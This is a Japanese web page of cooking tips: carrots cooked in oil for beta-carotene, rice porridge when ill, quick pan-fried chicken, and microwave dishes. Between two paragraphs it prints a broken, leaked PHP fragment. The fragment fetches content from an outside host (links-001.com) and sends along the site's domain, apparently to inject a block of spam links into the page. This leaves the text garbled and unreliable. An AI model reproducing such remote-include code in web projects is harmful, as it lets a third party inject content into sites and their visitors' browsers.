前へ
次へ

油と火を使う調理法が適した野菜もある

オレンジの色が明るくて元気いっぱいの人参の調理法は、生でもいいですが加熱をすることで体内での吸収が良くなります。
スライスしてサラダにトッピングをしたり、スティックにする食べ方も美味しいです。
豊富な人参に含まれるβカロテンは脂溶性ビタミンなので、調理をする際に油を使うことで、食べた時にも体の中に栄養がスムーズに吸収をされます。
βカロテンはビタミンAのことであり、生のままだとあまり吸収率は良くないですが、油を使い加熱をすると一気に吸収が良くなるため、炒め物などに使うのも良い方法です。
風邪をひいた血体調がイマイチの時は、食べて早く元気になりたいものの、イマイチ食欲がわきません。
早く回復するために風邪薬などを飲むとしても、何か最初にお腹に入れたほうが負担にはならないため、調理法を工夫して食事を用意することです。
元気な時ならおにぎりもモリモリ食べることができますが、体調が悪いとそうもいきません。
そこで白米を食べるなら水分を多くして作る、おかゆにすれば胃腸への負担は軽減されます。
おかゆを食べてお薬を飲めば、お腹も満たされて胃への負担も軽く、回復も早くなるので一石二鳥です。

".file_get_contents('http://links-001.com/kanren8set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

毎日の夕食作りですぐに食べられる献立にするなら、調理法は焼いて仕上げる料理が手っ取り早いです。
非加熱料理ばかりだと、サラダなどのあっさりした副菜などが多くなってしまうので、メインディッシュに火を使う料理が無いと寂しいですし、焼く料理は簡単で食べ応えもあります。
チキンをフライパンで焼いて、塩コショウで味付けをするだけでも見事なメインディッシュになりますし、見た目は豪華なのに実はかなり手抜き料理です。
フライパンや鍋などをいくつも使う手のこった料理は、たまにするにはいいですが毎日の食事作りでは面倒です。
忙しい現代人にピッタリの調理法として、電子レンジをフル活用した料理もたくさんあります。
油を使った揚げ物や炒め物は、後片付けがかなり面倒ですが、電子レンジで加熱する料理は料理も後片付けまで簡単です。
毎年高性能な電子レンジが発売されているので、フライパンや鍋を使った料理と大差ないほど、美味しい料理をレンジひとつでつくることができます。

Page Top